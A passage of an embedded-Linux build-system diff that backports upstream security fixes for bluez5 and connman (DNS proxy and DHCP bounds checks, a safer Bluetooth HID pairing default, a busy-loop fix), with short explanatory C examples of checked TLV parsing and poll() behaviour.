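The avdtp rework above turns the capability walk into a checked TLV (type/length/value) loop: every iteration first proves that a full header fits in the remaining bytes, then that the advertised payload fits, before anything is copied. A generic sketch of that walk; the record layout is a simplified stand-in for the AVDTP capability format:

    #include <stdio.h>
    #include <stdint.h>

    struct tlv {
        uint8_t type;
        uint8_t length;     /* number of payload bytes that follow */
    };

    /* Walk packed TLV records, rejecting any record whose claimed payload
     * would run past the end of the buffer instead of reading it. */
    static int walk_tlvs(const uint8_t *data, size_t size)
    {
        while (size >= sizeof(struct tlv)) {
            const struct tlv *rec = (const struct tlv *)data;
            size_t rec_len = sizeof(struct tlv) + rec->length;

            if (rec_len > size) {
                fprintf(stderr, "truncated record (type %u)\n", rec->type);
                return -1;
            }

            printf("record: type=%u payload=%u bytes\n", rec->type, rec->length);
            data += rec_len;
            size -= rec_len;
        }
        return size == 0 ? 0 : -1;   /* trailing bytes smaller than a header */
    }

    int main(void)
    {
        /* Two valid records, then one claiming 200 payload bytes when only
         * two remain -- the walk must stop there. */
        uint8_t buf[] = { 1, 2, 0xaa, 0xbb,  7, 0,  9, 200, 0xcc, 0xdd };

        return walk_tlvs(buf, sizeof(buf)) == 0 ? 0 : 1;
    }

Using size_t for the remaining length, as the patch does for caps_to_list(), also removes the signed/unsigned mismatches that made the original arithmetic easy to get wrong.
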
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
new file mode 100644
index 0000000000..43670ab2b3
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
@@ -0,0 +1,54 @@
+From 25a471a83e02e1effb15d5a488b3f0085eaeb675 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 10 Oct 2023 13:03:12 -0700
+Subject: input.conf: Change default of ClassicBondedOnly
+
+This changes the default of ClassicBondedOnly since defaulting to false
+is not in line with the HID specification, which mandates the use of
+Security Mode 4:
+
+BLUETOOTH SPECIFICATION Page 84 of 123
+Human Interface Device (HID) Profile:
+
+5.4.3.4.2 Security Modes
+Bluetooth HID Hosts shall use Security Mode 4 when interoperating with
+Bluetooth HID devices that are compliant to the Bluetooth Core
+Specification v2.1+EDR[6].
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=25a471a83e02e1effb15d5a488b3f0085eaeb675]
+CVE: CVE-2023-45866
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/input/device.c | 2 +-
+ profiles/input/input.conf | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/profiles/input/device.c b/profiles/input/device.c
+index 375314e..0236488 100644
+--- a/profiles/input/device.c
++++ b/profiles/input/device.c
+@@ -93,7 +93,7 @@ struct input_device {
+
+ static int idle_timeout = 0;
+ static bool uhid_enabled = false;
+-static bool classic_bonded_only = false;
++static bool classic_bonded_only = true;
+
+ void input_set_idle_timeout(int timeout)
+ {
+diff --git a/profiles/input/input.conf b/profiles/input/input.conf
+index 4c70bc5..d8645f3 100644
+--- a/profiles/input/input.conf
++++ b/profiles/input/input.conf
+@@ -17,7 +17,7 @@
+ # platforms may want to make sure that input connections only come from bonded
+ # device connections. Several older mice have been known for not supporting
+ # pairing/encryption.
+-# Defaults to false to maximize device compatibility.
++# Defaults to true for security.
+ #ClassicBondedOnly=true
+
+ # LE upgrade security
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
index 8190924562..be74a35e0a 100644
--- a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
+++ b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
@@ -3,6 +3,16 @@ require bluez5.inc
SRC_URI[md5sum] = "94972b8bc7ade60c72b0ffa6ccff2c0a"
SRC_URI[sha256sum] = "8863717113c4897e2ad3271fc808ea245319e6fd95eed2e934fae8e0894e9b88"
+# These issues have kernel fixes rather than bluez fixes so exclude here
+CVE_CHECK_WHITELIST += "CVE-2020-12352 CVE-2020-24490"
+
+# Commits 7a80d2096f1b7125085e21448112aa02f49f5e9a, e2b0f0d8d63e1223bb714a9efb37e2257818268b
+# and 0388794dc5fdb73a4ea88bcf148de0a12b4364d4, which fix CVE-2022-39177,
+# are already backported in CVE-2022-39176.patch
+# https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1977968
+
+CVE_CHECK_WHITELIST += "CVE-2022-39177"
+
# noinst programs in Makefile.tools that are conditional on READLINE
# support
NOINST_TOOLS_READLINE ?= " \
diff --git a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
index 778bf50191..24593d6258 100644
--- a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
+++ b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
@@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native"
# 0.7 tag
SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143"
-SRC_URI = "git://github.com/connectivity/connman-gnome.git \
+SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \
file://0001-Removed-icon-from-connman-gnome-about-applet.patch \
file://null_check_for_ipv4_config.patch \
file://images/* \
diff --git a/meta/recipes-connectivity/connman/connman.inc b/meta/recipes-connectivity/connman/connman.inc
index 55e5bf97c7..c495ae29ad 100644
--- a/meta/recipes-connectivity/connman/connman.inc
+++ b/meta/recipes-connectivity/connman/connman.inc
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
inherit autotools pkgconfig systemd update-rc.d update-alternatives
+CVE_PRODUCT = "connman connection_manager"
+
DEPENDS = "dbus glib-2.0 ppp"
INC_PR = "r20"
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
new file mode 100644
index 0000000000..2648a832ca
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
@@ -0,0 +1,62 @@
+From e4079a20f617a4b076af503f6e4e8b0304c9f2cb Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:53 +0100
+Subject: [PATCH] dnsproxy: Add length checks to prevent buffer overflow
+
+Fixes: CVE-2021-26675
+
+Upstream-Status: Backport
+CVE: CVE-2021-26675
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e4079a20f617a4b076af503f6e4e8b0304c9f2cb
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ src/dnsproxy.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index a7bf87a1..4f5c897f 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1767,6 +1767,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ char **uncompressed_ptr)
+ {
+ char *uptr = *uncompressed_ptr; /* position in result buffer */
++ char * const uncomp_end = uncompressed + uncomp_len - 1;
+
+ debug("count %d ptr %p end %p uptr %p", field_count, ptr, end, uptr);
+
+@@ -1787,12 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * tmp buffer.
+ */
+
+- ulen = strlen(name);
+- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
+-
+ debug("pos %d ulen %d left %d name %s", pos, ulen,
+ (int)(uncomp_len - (uptr - uncompressed)), uptr);
+
++ ulen = strlen(name);
++ if ((uptr + ulen + 1) > uncomp_end) {
++ goto out;
++ }
++ strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++
+ uptr += ulen;
+ *uptr++ = '\0';
+
+@@ -1802,6 +1806,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * We copy also the fixed portion of the result (type, class,
+ * ttl, address length and the address)
+ */
++ if ((uptr + NS_RRFIXEDSZ) > uncomp_end) {
++ debug("uncompressed data too large for buffer");
++ goto out;
++ }
+ memcpy(uptr, ptr, NS_RRFIXEDSZ);
+
+ dns_type = uptr[0] << 8 | uptr[1];
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
new file mode 100644
index 0000000000..4104e4bfc6
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
@@ -0,0 +1,231 @@
+From 58d397ba74873384aee449690a9070bacd5676fa Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:39:14 +0100
+Subject: [PATCH] gdhcp: Avoid reading invalid data in dhcp_get_option
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=58d397ba74873384aee449690a9070bacd5676fa
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 20 +++++++++++---------
+ gdhcp/common.c | 24 +++++++++++++++++++-----
+ gdhcp/common.h | 2 +-
+ gdhcp/server.c | 12 +++++++-----
+ 4 files changed, 38 insertions(+), 20 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 09dfe5ec..6a5613e7 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1629,12 +1629,12 @@ static void start_request(GDHCPClient *dhcp_client)
+ NULL);
+ }
+
+-static uint32_t get_lease(struct dhcp_packet *packet)
++static uint32_t get_lease(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+ uint8_t *option;
+ uint32_t lease_seconds;
+
+- option = dhcp_get_option(packet, DHCP_LEASE_TIME);
++ option = dhcp_get_option(packet, packet_len, DHCP_LEASE_TIME);
+ if (!option)
+ return 3600;
+
+@@ -2226,7 +2226,8 @@ static void get_dhcpv6_request(GDHCPClient *dhcp_client,
+ }
+ }
+
+-static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
++static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet,
++ uint16_t packet_len)
+ {
+ GDHCPOptionType type;
+ GList *list, *value_list;
+@@ -2237,7 +2238,7 @@ static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
+ for (list = dhcp_client->request_list; list; list = list->next) {
+ code = (uint8_t) GPOINTER_TO_INT(list->data);
+
+- option = dhcp_get_option(packet, code);
++ option = dhcp_get_option(packet, packet_len, code);
+ if (!option) {
+ g_hash_table_remove(dhcp_client->code_value_hash,
+ GINT_TO_POINTER((int) code));
+@@ -2297,6 +2298,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ re = dhcp_recv_l2_packet(&packet,
+ dhcp_client->listener_sockfd,
+ &dst_addr);
++ pkt_len = (uint16_t)(unsigned int)re;
+ xid = packet.xid;
+ } else if (dhcp_client->listen_mode == L3) {
+ if (dhcp_client->type == G_DHCP_IPV6) {
+@@ -2361,7 +2363,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->status_code = status;
+ }
+ } else {
+- message_type = dhcp_get_option(&packet, DHCP_MESSAGE_TYPE);
++ message_type = dhcp_get_option(&packet, pkt_len, DHCP_MESSAGE_TYPE);
+ if (!message_type)
+ return TRUE;
+ }
+@@ -2378,7 +2380,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->timeout = 0;
+ dhcp_client->retry_times = 0;
+
+- option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++ option = dhcp_get_option(&packet, pkt_len, DHCP_SERVER_ID);
+ dhcp_client->server_ip = get_be32(option);
+ dhcp_client->requested_ip = ntohl(packet.yiaddr);
+
+@@ -2428,9 +2430,9 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+
+ remove_timeouts(dhcp_client);
+
+- dhcp_client->lease_seconds = get_lease(&packet);
++ dhcp_client->lease_seconds = get_lease(&packet, pkt_len);
+
+- get_request(dhcp_client, &packet);
++ get_request(dhcp_client, &packet, pkt_len);
+
+ switch_listening_mode(dhcp_client, L_NONE);
+
+@@ -2438,7 +2440,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->assigned_ip = get_ip(packet.yiaddr);
+
+ if (dhcp_client->state == REBOOTING) {
+- option = dhcp_get_option(&packet,
++ option = dhcp_get_option(&packet, pkt_len,
+ DHCP_SERVER_ID);
+ dhcp_client->server_ip = get_be32(option);
+ }
+diff --git a/gdhcp/common.c b/gdhcp/common.c
+index 1d667d17..c8916aa8 100644
+--- a/gdhcp/common.c
++++ b/gdhcp/common.c
+@@ -73,18 +73,21 @@ GDHCPOptionType dhcp_get_code_type(uint8_t code)
+ return OPTION_UNKNOWN;
+ }
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code)
+ {
+ int len, rem;
+- uint8_t *optionptr;
++ uint8_t *optionptr, *options_end;
++ size_t options_len;
+ uint8_t overload = 0;
+
+ /* option bytes: [code][len][data1][data2]..[dataLEN] */
+ optionptr = packet->options;
+ rem = sizeof(packet->options);
++ options_len = packet_len - (sizeof(*packet) - sizeof(packet->options));
++ options_end = optionptr + options_len - 1;
+
+ while (1) {
+- if (rem <= 0)
++ if ((rem <= 0) && (optionptr + OPT_CODE > options_end))
+ /* Bad packet, malformed option field */
+ return NULL;
+
+@@ -115,14 +118,25 @@ uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
+ break;
+ }
+
++ if (optionptr + OPT_LEN > options_end) {
++ /* bad packet, would read length field from OOB */
++ return NULL;
++ }
++
+ len = 2 + optionptr[OPT_LEN];
+
+ rem -= len;
+ if (rem < 0)
+ continue; /* complain and return NULL */
+
+- if (optionptr[OPT_CODE] == code)
+- return optionptr + OPT_DATA;
++ if (optionptr[OPT_CODE] == code) {
++ if (optionptr + len > options_end) {
++ /* bad packet, option length points OOB */
++ return NULL;
++ } else {
++ return optionptr + OPT_DATA;
++ }
++ }
+
+ if (optionptr[OPT_CODE] == DHCP_OPTION_OVERLOAD)
+ overload |= optionptr[OPT_DATA];
+diff --git a/gdhcp/common.h b/gdhcp/common.h
+index 9660231c..8f63fd75 100644
+--- a/gdhcp/common.h
++++ b/gdhcp/common.h
+@@ -179,7 +179,7 @@ struct in6_pktinfo {
+ };
+ #endif
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code);
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code);
+ uint8_t *dhcpv6_get_option(struct dhcpv6_packet *packet, uint16_t pkt_len,
+ int code, uint16_t *option_len, int *option_count);
+ uint8_t *dhcpv6_get_sub_option(unsigned char *option, uint16_t max_len,
+diff --git a/gdhcp/server.c b/gdhcp/server.c
+index 85405f19..52ea2a55 100644
+--- a/gdhcp/server.c
++++ b/gdhcp/server.c
+@@ -413,7 +413,7 @@ error:
+ }
+
+
+-static uint8_t check_packet_type(struct dhcp_packet *packet)
++static uint8_t check_packet_type(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+ uint8_t *type;
+
+@@ -423,7 +423,7 @@ static uint8_t check_packet_type(struct dhcp_packet *packet)
+ if (packet->op != BOOTREQUEST)
+ return 0;
+
+- type = dhcp_get_option(packet, DHCP_MESSAGE_TYPE);
++ type = dhcp_get_option(packet, packet_len, DHCP_MESSAGE_TYPE);
+
+ if (!type)
+ return 0;
+@@ -651,6 +651,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ struct dhcp_lease *lease;
+ uint32_t requested_nip = 0;
+ uint8_t type, *server_id_option, *request_ip_option;
++ uint16_t packet_len;
+ int re;
+
+ if (condition & (G_IO_NVAL | G_IO_ERR | G_IO_HUP)) {
+@@ -661,12 +662,13 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ re = dhcp_recv_l3_packet(&packet, dhcp_server->listener_sockfd);
+ if (re < 0)
+ return TRUE;
++ packet_len = (uint16_t)(unsigned int)re;
+
+- type = check_packet_type(&packet);
++ type = check_packet_type(&packet, packet_len);
+ if (type == 0)
+ return TRUE;
+
+- server_id_option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++ server_id_option = dhcp_get_option(&packet, packet_len, DHCP_SERVER_ID);
+ if (server_id_option) {
+ uint32_t server_nid =
+ get_unaligned((const uint32_t *) server_id_option);
+@@ -675,7 +677,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ return TRUE;
+ }
+
+- request_ip_option = dhcp_get_option(&packet, DHCP_REQUESTED_IP);
++ request_ip_option = dhcp_get_option(&packet, packet_len, DHCP_REQUESTED_IP);
+ if (request_ip_option)
+ requested_nip = get_be32(request_ip_option);
+
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
new file mode 100644
index 0000000000..ce909ec293
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
@@ -0,0 +1,33 @@
+From a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1 Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:09 +0100
+Subject: [PATCH] gdhcp: Avoid leaking stack data via uninitialized variable
+
+Fixes: CVE-2021-26676
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 6a5613e7..c7b85e58 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -2270,7 +2270,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ {
+ GDHCPClient *dhcp_client = user_data;
+ struct sockaddr_in dst_addr = { 0 };
+- struct dhcp_packet packet;
++ struct dhcp_packet packet = { 0 };
+ struct dhcpv6_packet *packet6 = NULL;
+ uint8_t *message_type = NULL, *client_id = NULL, *option,
+ *server_id = NULL;
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
new file mode 100644
index 0000000000..770948fb69
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
@@ -0,0 +1,72 @@
+From eceb2e8d2341c041df55a5e2f047d9a8c491463c Mon Sep 17 00:00:00 2001
+From: Valery Kashcheev <v.kascheev@omp.ru>
+Date: Mon, 7 Jun 2021 18:58:24 +0200
+Subject: dnsproxy: Check the length of buffers before memcpy
+
+Prevent a stack-based buffer overflow attack by checking the length of
+the ptr and uptr buffers.
+
+Fix debug message output.
+
+Fixes: CVE-2021-33833
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=eceb2e8d2341c041df55a5e2f047d9a8c491463c
+CVE: CVE-2021-33833
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index de52df5a..38dbdd71 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1788,17 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * tmp buffer.
+ */
+
+- debug("pos %d ulen %d left %d name %s", pos, ulen,
+- (int)(uncomp_len - (uptr - uncompressed)), uptr);
+-
+- ulen = strlen(name);
+- if ((uptr + ulen + 1) > uncomp_end) {
++ ulen = strlen(name) + 1;
++ if ((uptr + ulen) > uncomp_end)
+ goto out;
+- }
+- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++ strncpy(uptr, name, ulen);
++
++ debug("pos %d ulen %d left %d name %s", pos, ulen,
++ (int)(uncomp_end - (uptr + ulen)), uptr);
+
+ uptr += ulen;
+- *uptr++ = '\0';
+
+ ptr += pos;
+
+@@ -1841,7 +1839,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ } else if (dns_type == ns_t_a || dns_type == ns_t_aaaa) {
+ dlen = uptr[-2] << 8 | uptr[-1];
+
+- if (ptr + dlen > end) {
++ if ((ptr + dlen) > end || (uptr + dlen) > uncomp_end) {
+ debug("data len %d too long", dlen);
+ goto out;
+ }
+@@ -1880,6 +1878,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * refresh interval, retry interval, expiration
+ * limit and minimum ttl). They are 20 bytes long.
+ */
++ if ((uptr + 20) > uncomp_end || (ptr + 20) > end) {
++ debug("soa record too long");
++ goto out;
++ }
+ memcpy(uptr, ptr, 20);
+ uptr += 20;
+ ptr += 20;
+--
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
new file mode 100644
index 0000000000..7f27474830
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
@@ -0,0 +1,121 @@
+From e5a313736e13c90d19085e953a26256a198e4950 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
+Date: Tue, 25 Jan 2022 10:00:24 +0100
+Subject: dnsproxy: Validate input data before using them
+
+dnsproxy is not validating various input data. Add a bunch of checks.
+
+Fixes: CVE-2022-23097
+Fixes: CVE-2022-23096
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e5a313736e13c90d19085e953a26256a198e4950
+
+CVE: CVE-2022-23096 CVE-2022-23097
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 31 ++++++++++++++++++++++++++-----
+ 1 file changed, 26 insertions(+), 5 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index cdfafbc2..c027bcb9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1951,6 +1951,12 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+
+ if (offset < 0)
+ return offset;
++ if (reply_len < 0)
++ return -EINVAL;
++ if (reply_len < offset + 1)
++ return -EINVAL;
++ if ((size_t)reply_len < sizeof(struct domain_hdr))
++ return -EINVAL;
+
+ hdr = (void *)(reply + offset);
+ dns_id = reply[offset] | reply[offset + 1] << 8;
+@@ -1986,23 +1992,31 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ */
+ if (req->append_domain && ntohs(hdr->qdcount) == 1) {
+ uint16_t domain_len = 0;
+- uint16_t header_len;
++ uint16_t header_len, payload_len;
+ uint16_t dns_type, dns_class;
+ uint8_t host_len, dns_type_pos;
+ char uncompressed[NS_MAXDNAME], *uptr;
+ char *ptr, *eom = (char *)reply + reply_len;
++ char *domain;
+
+ /*
+ * ptr points to the first char of the hostname.
+ * ->hostname.domain.net
+ */
+ header_len = offset + sizeof(struct domain_hdr);
++ if (reply_len < header_len)
++ return -EINVAL;
++ payload_len = reply_len - header_len;
++
+ ptr = (char *)reply + header_len;
+
+ host_len = *ptr;
++ domain = ptr + 1 + host_len;
++ if (domain > eom)
++ return -EINVAL;
++
+ if (host_len > 0)
+- domain_len = strnlen(ptr + 1 + host_len,
+- reply_len - header_len);
++ domain_len = strnlen(domain, eom - domain);
+
+ /*
+ * If the query type is anything other than A or AAAA,
+@@ -2011,6 +2025,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ */
+ dns_type_pos = host_len + 1 + domain_len + 1;
+
++ if (ptr + (dns_type_pos + 3) > eom)
++ return -EINVAL;
+ dns_type = ptr[dns_type_pos] << 8 |
+ ptr[dns_type_pos + 1];
+ dns_class = ptr[dns_type_pos + 2] << 8 |
+@@ -2040,6 +2056,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ int new_len, fixed_len;
+ char *answers;
+
++ if (len > payload_len)
++ return -EINVAL;
+ /*
+ * First copy host (without domain name) into
+ * tmp buffer.
+@@ -2054,6 +2072,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ * Copy type and class fields of the question.
+ */
+ ptr += len + domain_len + 1;
++ if (ptr + NS_QFIXEDSZ > eom)
++ return -EINVAL;
+ memcpy(uptr, ptr, NS_QFIXEDSZ);
+
+ /*
+@@ -2063,6 +2083,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ uptr += NS_QFIXEDSZ;
+ answers = uptr;
+ fixed_len = answers - uncompressed;
++ if (ptr + offset > eom)
++ return -EINVAL;
+
+ /*
+ * We then uncompress the result to buffer
+@@ -2257,8 +2279,7 @@ static gboolean udp_server_event(GIOChannel *channel, GIOCondition condition,
+
+ len = recv(sk, buf, sizeof(buf), 0);
+
+- if (len >= 12)
+- forward_dns_reply(buf, len, IPPROTO_UDP, data);
++ forward_dns_reply(buf, len, IPPROTO_UDP, data);
+
+ return TRUE;
+ }
+--
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
new file mode 100644
index 0000000000..a40c9f583f
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
@@ -0,0 +1,50 @@
+From d8708b85c1e8fe25af7803e8a20cf20e7201d8a4 Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <mgerstner@suse.de>
+Date: Tue, 25 Jan 2022 10:00:25 +0100
+Subject: dnsproxy: Avoid 100 % busy loop in TCP server case
+
+Once the TCP socket is connected and until the remote server is
+responding (if ever) ConnMan executes a 100 % CPU loop, since
+the connected socket will always be writable (G_IO_OUT).
+
+To fix this, modify the watch after the connection is established to
+remove the G_IO_OUT from the callback conditions.
+
+Fixes: CVE-2022-23098
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d8708b85c1e8fe25af7803e8a20cf20e7201d8a4
+
+CVE: CVE-2022-23098
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index c027bcb9..1ccf36a9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -2360,6 +2360,18 @@ hangup:
+ }
+ }
+
++ /*
++ * Remove the G_IO_OUT flag from the watch, otherwise we end
++ * up in a busy loop, because the socket is constantly writable.
++ *
++ * There seems to be no better way in g_io to do that than
++ * re-adding the watch.
++ */
++ g_source_remove(server->watch);
++ server->watch = g_io_add_watch(server->channel,
++ G_IO_IN | G_IO_HUP | G_IO_NVAL | G_IO_ERR,
++ tcp_server_event, server);
++
+ server->connected = true;
+ server_list = g_slist_append(server_list, server);
+
+--
+cgit 1.2.3-1.el7
+
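The busy-loop fix above comes down to a general event-loop rule: only ask to be woken for writability while output is actually queued, because a connected socket is writable nearly all the time. The poll()-based sketch below demonstrates the effect outside of GLib; socketpair() stands in for the connected TCP socket:

    #include <stdio.h>
    #include <poll.h>
    #include <sys/socket.h>

    int main(void)
    {
        int sv[2];

        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
            return 1;

        /* Watching for POLLOUT on an idle, connected socket returns
         * immediately every time -- the shape of the 100 % CPU loop. */
        struct pollfd pfd = { .fd = sv[0], .events = POLLIN | POLLOUT };
        int n = poll(&pfd, 1, 1000);
        printf("with POLLOUT:    poll() -> %d (returned at once)\n", n);

        /* Watching only for readability (errors and hangup are always
         * reported) blocks until data arrives or the timeout expires. */
        pfd.events = POLLIN;
        n = poll(&pfd, 1, 1000);
        printf("without POLLOUT: poll() -> %d (slept for the timeout)\n", n);
        return 0;
    }

In GLib terms that is exactly what the patch does: once the connection is up, the watch is re-added without G_IO_OUT so the dispatcher no longer fires on every main-loop iteration.
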
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
new file mode 100644
index 0000000000..74a739d6a2
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
@@ -0,0 +1,37 @@
+From d1a5ede5d255bde8ef707f8441b997563b9312bd Mon Sep 17 00:00:00 2001
+From: Nathan Crandall <ncrandall@tesla.com>
+Date: Tue, 12 Jul 2022 08:56:34 +0200
+Subject: gweb: Fix OOB write in received_data()
+
+There is a mismatch of handling binary vs. C-string data with memchr
+and strlen, causing pos, count, and bytes_read to get out of sync,
+which results in a heap overflow. Instead, do not treat the buffer
+as an ASCII C-string. We calculate the count based on the return value
+of memchr, instead of strlen.
+
+Fixes: CVE-2022-32292
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d1a5ede5d255bde8ef707f8441b997563b9312b
+CVE: CVE-2022-32292
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+---
+ gweb/gweb.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
